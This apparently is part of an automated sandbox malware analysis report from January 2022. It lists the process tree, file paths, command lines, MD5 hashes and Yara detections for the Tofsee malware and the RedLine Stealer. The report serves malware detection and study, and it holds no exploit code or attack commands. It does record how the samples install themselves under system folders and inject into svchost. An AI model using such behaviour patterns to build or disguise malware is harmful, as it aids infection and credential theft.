                                                                                                                                                                                                            Analysis Process: szdcdkt.exe PID: 2972 Parent PID: 560

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:23:29:33
                                                                                                                                                                                                            Start date:13/01/2022
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exe /d"C:\Users\user\AppData\Local\Temp\A8FB.exe"
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            File size:14635008 bytes
                                                                                                                                                                                                            MD5 hash:F23C1D7C6806E4BFAA8ABAD7CCC77AC1
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000024.00000003.507342269.0000000000690000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000024.00000002.511069227.0000000000EB0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000024.00000002.510317453.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000024.00000002.510779082.0000000000670000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                                                                                                            Analysis Process: conhost.exe PID: 4820 Parent PID: 4388

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:23:29:33
                                                                                                                                                                                                            Start date:13/01/2022
                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                            Imagebase:0x7ff61de10000
                                                                                                                                                                                                            File size:625664 bytes
                                                                                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                                                                            Analysis Process: svchost.exe PID: 6780 Parent PID: 2972

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:23:29:38
                                                                                                                                                                                                            Start date:13/01/2022
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:svchost.exe
                                                                                                                                                                                                            Imagebase:0xf20000
                                                                                                                                                                                                            File size:44520 bytes
                                                                                                                                                                                                            MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000027.00000002.631897455.0000000000A50000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                                                                                                            Analysis Process: svchost.exe PID: 1624 Parent PID: 560

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:23:29:41
                                                                                                                                                                                                            Start date:13/01/2022
                                                                                                                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                            Imagebase:0x7ff6b7590000
                                                                                                                                                                                                            File size:51288 bytes
                                                                                                                                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                                                                            Analysis Process: B3BA.exe PID: 4264 Parent PID: 6964

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:23:29:41
                                                                                                                                                                                                            Start date:13/01/2022
                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\B3BA.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\B3BA.exe
                                                                                                                                                                                                            Imagebase:0x250000
                                                                                                                                                                                                            File size:537088 bytes
                                                                                                                                                                                                            MD5 hash:D7DF01D8158BFADDC8BA48390E52F355
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                                                                            Analysis Process: B3BA.exe PID: 1756 Parent PID: 6964

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:23:29:46
                                                                                                                                                                                                            Start date:13/01/2022
                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\B3BA.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\B3BA.exe
                                                                                                                                                                                                            Imagebase:0x9b0000
                                                                                                                                                                                                            File size:537088 bytes
                                                                                                                                                                                                            MD5 hash:D7DF01D8158BFADDC8BA48390E52F355
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000002A.00000000.537971963.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000002A.00000002.629733104.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000002A.00000000.539310965.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000002A.00000000.538607329.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000002A.00000000.537161217.0000000000402000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                                                                                                            Disassembly

                                                                                                                                                                                                            Code Analysis

                                                                                                                                                                                                            Reset < >